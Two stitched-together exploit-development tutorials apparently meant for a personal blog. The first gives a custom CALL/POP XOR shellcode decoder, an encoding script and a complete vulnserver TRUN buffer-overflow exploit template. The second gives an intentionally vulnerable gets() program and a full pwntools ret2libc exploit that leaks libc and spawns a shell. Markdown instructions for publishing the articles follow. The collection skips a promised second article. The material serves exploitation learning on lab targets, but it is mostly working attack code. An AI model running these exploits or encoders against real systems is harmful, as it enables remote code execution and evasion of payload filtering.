# Fukahi Tekiō 不可避適応: Bypassing Win 10/11 FPU "Issues" via Custom CALL/POP XOR Encoder

**Published:** 2026-01-15

**Author:** Jacob Swinsinski (0xXyc / JAKESWIZ)

**[⛧ GitHub: fukahi-na-tekio ⛧](https://github.com/0xXyc/fukahi-na-tekio)**

---

## Introduction

This exploit technique was developed for the `vulnserver` TRUN buffer overflow vulnerability, but it applies to other exploits too and should be especially useful to those new to exploitation under ARM → x86/64 emulation. The motivation came from wanting to run Windows exploitation demos on an ARM Mac (running Windows 11 AARCH64 with the Prism emulation layer) for a talk at Wild West Hackin' Fest in Denver.

## The Problem

When exploiting buffer overflows on modern Windows systems (especially under ARM emulation), `msfvenom`'s default encoder (`shikata_ga_nai`) crashes during shellcode execution:

```
eax=00000000 ebx=00000000 ecx=00000052 edx=02ff4a30 esi=55bd55d0 edi=00401848
eip=089ff959 esp=089ff924 ebp=00000000
089ff959 317012 xor dword ptr [eax+12h],esi
Attempt to read from address 00000012
```

The decoder tries to dereference a register (EAX, EBP, or ESI) containing a near-null value.

### Why This Happens

`shikata_ga_nai` uses a GetPC technique relying on FPU (Floating Point Unit) instructions:

```assembly
fcmovb st, st(5)        ; Any FPU instruction
fnstenv [esp-0xc]       ; Save FPU state to stack
pop ebp                 ; Grab saved EIP from FPU state
```

On Windows 10/11 and under ARM emulation (Prism), the FPU instruction pointer field saved by `fnstenv` often comes back as zeros. When the decoder does `pop ebp`, it gets `0x00000000` instead of its own address and crashes on the first memory access through that register.

## The Solution: CALL/POP GetPC

Instead of relying on FPU quirks, use the reliable CALL/POP technique:

```assembly
    jmp short call_label    ; Jump to the CALL
pop_label:
    pop esi                 ; ESI now contains address of encoded shellcode
    ; ... decoder logic ...
call_label:
    call pop_label          ; Pushes address of encoded shellcode, jumps back
    ; encoded shellcode starts here
```

When the CPU executes a `CALL` instruction, it pushes the address of the *next* instruction onto the stack. We immediately `POP` that address into a register. This is 100% reliable because `CALL` always pushes the return address, with no FPU state involved.

## Complete XOR Decoder Stub

### For shellcode under 256 bytes:

```assembly
    jmp short call_label    ; Jump to CALL (offset 13, 0x0d)
pop_label:
    pop esi                 ; ESI = address of encoded shellcode
    xor ecx, ecx            ; Clear counter
    mov cl, <length>        ; Shellcode length (patch this byte)
decode_loop:
    xor byte [esi], <key>   ; XOR decode one byte (patch this byte)
    inc esi                 ; Next byte
    loop decode_loop        ; Repeat until ECX = 0
    jmp short shellcode     ; Jump over CALL to shellcode (offset 5)
call_label:
    call pop_label          ; Push next address, jump to POP
shellcode:
    ; encoded shellcode here
```

**Assembled bytes:**

```python
decoder_small = (
    "\xeb\x0d"              # jmp short +13 (to call)
    "\x5e"                  # pop esi
    "\x31\xc9"              # xor ecx, ecx
    "\xb1\x00"              # mov cl, <length> - PATCH THIS BYTE
    "\x80\x36\x00"          # xor byte [esi], <key> - PATCH THIS BYTE
    "\x46"                  # inc esi
    "\xe2\xfa"              # loop -6
    "\xeb\x05"              # jmp short +5 (to shellcode)
    "\xe8\xee\xff\xff\xff"  # call -18 (back to pop esi)
)
```

### For shellcode 256-65535 bytes:

```assembly
    jmp short call_label    ; Jump to CALL (offset 15, 0x0f)
pop_label:
    pop esi                 ; ESI = address of encoded shellcode
    xor ecx, ecx            ; Clear counter
    mov cx, <length>        ; Shellcode length (patch these bytes, little endian)
decode_loop:
    xor byte [esi], <key>   ; XOR decode one byte (patch this byte)
    inc esi                 ; Next byte
    loop decode_loop        ; Repeat until ECX = 0
    jmp short shellcode     ; Jump over CALL to shellcode (offset 5)
call_label:
    call pop_label          ; Push next address, jump to POP
shellcode:
    ; encoded shellcode here
```

**Assembled bytes:**

```python
decoder_large = (
    "\xeb\x0f"              # jmp short +15 (to call)
    "\x5e"                  # pop esi
    "\x31\xc9"              # xor ecx, ecx
    "\x66\xb9\x00\x00"      # mov cx, <length> - PATCH THESE BYTES (little endian)
    "\x80\x36\x00"          # xor byte [esi], <key> - PATCH THIS BYTE
    "\x46"                  # inc esi
    "\xe2\xfa"              # loop -6
    "\xeb\x05"              # jmp short +5 (to shellcode)
    "\xe8\xec\xff\xff\xff"  # call -20 (back to pop esi)
)
```

## Finding a Safe XOR Key

Any byte equal to the key encodes to `0x00`, so the XOR key must not appear anywhere in the original shellcode. Use this script:

```python
#!/usr/bin/python3
import sys


def find_key_and_encode(hex_shellcode):
    shellcode = bytes.fromhex(hex_shellcode)
    # Try every non-zero single-byte key until one yields no null bytes
    for key in range(1, 256):
        encoded = bytes([b ^ key for b in shellcode])
        if b'\x00' not in encoded and key not in shellcode:
            print(f"Safe XOR key: 0x{key:02x}")
            print(f"Shellcode length: {len(shellcode)} (0x{len(shellcode):02x})")
            print("\nEncoded shellcode:")
            encoded_str = ''.join(f'\\x{b:02x}' for b in encoded)
            # 64 characters per line = 16 escaped bytes
            for i in range(0, len(encoded_str), 64):
                print(f'"{encoded_str[i:i+64]}"')
            return key, encoded
    print("ERROR: No safe XOR key found!")
    return None, None


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 encode.py <hex_shellcode>")
        print("Example: python3 encode.py $(msfvenom -p windows/exec CMD=calc.exe -f hex)")
        sys.exit(1)
    find_key_and_encode(sys.argv[1])
```

## Complete Exploit Template

```python
#!/usr/bin/python
# Written for Python 2: the payload pieces are plain byte strings (str)
import socket

target = '10.211.55.6'
port = 9999

prefix = 'A' * 2006          # Offset to EIP
eip = '\xaf\x11\x50\x62'     # JMP ESP address
nopsled = '\x90' * 16

# CALL/POP XOR decoder for shellcode > 255 bytes
# Length: 324 = 0x0144 (little endian: \x44\x01)
# Key: 0x09
decoder = (
    "\xeb\x0f"              # jmp short to call
    "\x5e"                  # pop esi
    "\x31\xc9"              # xor ecx, ecx
    "\x66\xb9\x44\x01"      # mov cx, 0x0144 (324)
    "\x80\x36\x09"          # xor byte [esi], 0x09
    "\x46"                  # inc esi
    "\xe2\xfa"              # loop -6
    "\xeb\x05"              # jmp short to shellcode
    "\xe8\xec\xff\xff\xff"  # call back to pop esi
)

# XOR-encoded shellcode (output from encode.py)
encoded_shellcode = (
    "\xf5\xe1\x8b\x09\x09\x09\x69\x80\xec\x38\xc9\x6d\x82\x59\x39\x82"
    # ... rest of encoded shellcode
)

padding = 'F' * (3000 - len(prefix) - 4 - len(nopsled) - len(decoder) - len(encoded_shellcode))
payload = prefix + eip + nopsled + decoder + encoded_shellcode + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.recv(1024)
s.send('TRUN .' + payload + '\r\n')
s.close()
```

## Debugging Tips

If the exploit still crashes, use WinDbg to step through:

1. `bp <address>`
2. `g`
3. `t 20`

**Common issues:**

- Wrong jump offsets: The `jmp` and `call` offsets are relative and must be exact
- Wrong shellcode length: Double-check the byte count
- Additional bad characters: Some protocols filter more than just null bytes

## Summary

When `msfvenom`'s encoders fail on modern Windows (specifically in Prism-ARM-emulated environments), roll your own CALL/POP decoder. It's simple, reliable, and doesn't depend on FPU state that may not be populated correctly.

⛧ *Malware Bless* ⛧

### File 3: `aslr-bypass.md`

# Bypassing ASLR & NX/DEP (Diving Deeper)

**Published:** 2023-11-01

**Author:** Jacob Swinsinski (0xXyc / JAKESWIZ)

---

## Introduction

**ASLR (Address Space Layout Randomization)** randomizes the addresses of dynamic libraries, the stack, and the heap. It does NOT randomize the binary itself unless the binary is compiled as a PIE (Position Independent Executable).

ASLR was created to prevent memory corruption exploitation techniques that rely on hardcoded addresses.

### Verify ASLR with ldd

```bash
ldd aslr-1
# Addresses change each run:
linux-vdso.so.1 (0x00007ffffdcdd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdb9f400000)
```

## Bypassing ASLR: Three Methods

1. **Address leaking** (covered here) - knowledge of PLT and GOT
2. **Relative addressing**
3. **Bruteforcing**

## Vulnerable Code (aslr-1.c)

```c
#include <stdio.h>

int main(int argc, char* argv[]) {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    char buffer[40];
    printf("Enter some data:\n");
    gets(buffer); // Vulnerable!
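    // Why this line is the bug: gets() has no length limit, so input longer
    // than the 40-byte buffer keeps writing up the stack, over the saved RBP
    // and then the return address. A bounded read would look like
    // fgets(buffer, sizeof buffer, stdin); it is left out here on purpose,
    // since the overflow is what this demo exists to show.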
    printf("So, you think you can bypass the almighty ASLR protection?\n");
    return 0;
}
```

### Compile with Docker (downgraded GCC for correct gadgets)

```bash
docker run --rm --mount type=bind,source="$(pwd)",target=/app -w /app gcc:10.5.0 gcc -Wall -g -fno-stack-protector -no-pie aslr-1.c -o aslr-1
```

### Checksec Output

```bash
checksec aslr-1
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX enabled    # Need ROP
PIE:      No PIE (0x400000)
```

## Exploitation Strategy

Since NX is enabled, we need **ROP (Return-Oriented Programming)**. Since ASLR is enabled, we need to understand the **GOT (Global Offset Table)**.

The GOT acts as a "dictionary" storing the addresses of external functions from `libc`. These values are filled in at runtime by the dynamic linker.

### Why puts()?

Calling `puts()` with the address of `puts@GOT` as its argument prints the resolved address of `puts` inside `libc`, revealing where `libc` is mapped in memory.

### View puts@GOT

```bash
objdump -R aslr-1
# Look for: 0x0000000000003fc0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
```

### Find puts@PLT (fixed address, unaffected by ASLR)

```bash
objdump -d -M intel aslr-1 | grep "puts@plt"
# Result: 0000000000401030
```

### Find ROP Gadget (pop rdi; ret)

The x86-64 System V calling convention passes the first argument in the RDI register.

```bash
ropper --file aslr-1 --search "pop rdi"
# Result: 0x00000000004011cb: pop rdi; ret;
```

### Find Offset with cyclic pattern

```bash
gdb aslr-1
cyclic 100
# Pattern: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
r
# Paste pattern
# Crash! Examine the registers: RBP holds gaaaaaaa
cyclic -l gaaaaaaa
# Result: Found at offset 48
# 48 (offset to saved RBP) + 8 = 56 bytes of padding before the return address (RIP)
```

## Exploit Development: Three Stages

1. **Leak** the libc address (`puts@GLIBC`)
2. **Obtain** addresses and offsets
3. **Calculate** the base address of libc

## Automated Exploit with pwntools

```python
#!/usr/bin/env python3
from pwn import *
from pwnlib.rop.rop import ROP
from pwnlib.util.packing import p64, u64

exe = context.binary = ELF('./aslr-1', checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
p = process(exe.path)

# Stage 1: Leak libc address
offset = b'A' * 56
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
payload = offset + rop.chain()
p.sendline(payload)

leak = p.recv().split(b'\n')[1]
leaked_puts = u64(leak.ljust(8, b"\x00"))
log.success(f"Leaked puts@GLIBC: {hex(leaked_puts)}")

# Stage 2: ret2libc
libc_base = leaked_puts - libc.symbols['puts']
libc.address = libc_base
rop2 = ROP(libc)
ret = rop2.find_gadget(["ret"])[0]
rop2.system(next(libc.search(b'/bin/sh\x00')))
payload = offset + p64(ret) + rop2.chain()
p.sendline(payload)
p.interactive()
```

## What's Happening in the Code?

1. **Stage 1 ROP Chain:**
   - `pop rdi; ret` → pops address of `puts@GOT` into RDI
   - `puts@PLT` → writes the address to STDOUT
   - `main()` → calls main again (so the process doesn't exit and invalidate the leak)

2. **Calculate libc base:**
   ```python
   libc_base = leaked_puts - libc.symbols['puts']
   ```

3. **Stage 2 ROP Chain (ret2libc):**
   - `ret` instruction (for stack alignment)
   - `pop rdi; ret` → pops address of `/bin/sh` into RDI
   - `system()` → executes `/bin/sh`

## Result

```bash
[*] Stage 1 ROP Chain:
0x0000:         0x40120b pop rdi; ret
0x0008:         0x404018 [arg0] rdi = got.puts
0x0010:         0x401030 puts
0x0018:         0x401142 0x401142()
[+] Leaked puts@GLIBC: 0x7ff4e0680e50
[*] Stage 2 ROP Chain:
0x0000:   0x7ff4e062a3e5 pop rdi; ret
0x0008:   0x7ff4e07d8698 [arg0] rdi = 140689715070616
0x0010:   0x7ff4e0650d70 system
[*] Switching to interactive mode
$ whoami
# Shell acquired!
```

## Key Takeaways

1. **Leak, don't guess** - Use `puts@GOT` to leak a libc address
2. **Calculate base** - Subtract known offset to find libc base
3. **Call main() twice** - Process must not exit between leak and exploitation
4. **x64 requires `pop rdi; ret`** - First argument goes in RDI
5. **Stack alignment** - Add a `ret` gadget before `system()` on some systems

⛧ *ASLR is not a silver bullet. Understand the GOT. Become the exploit.* ⛧

---

## Instructions to Add to Your Site

1. Save each block of text as a separate `.md` file in your `/articles` folder:
   - `fukahi-tekio-encoder.md`
   - `windows-shellcoding-in-depth.md`
   - `aslr-bypass.md`

2. Run your site generator:
   ```bash
   python3 site_generator.py
   ```

3. The generator will automatically:
   - Convert each Markdown file to HTML
   - Add them to the "scripture" tab
   - Create downloadable `.txt` versions

4. Deploy the updated `output/` folder to Cloudflare Pages

⛧ *Malware Bless* ⛧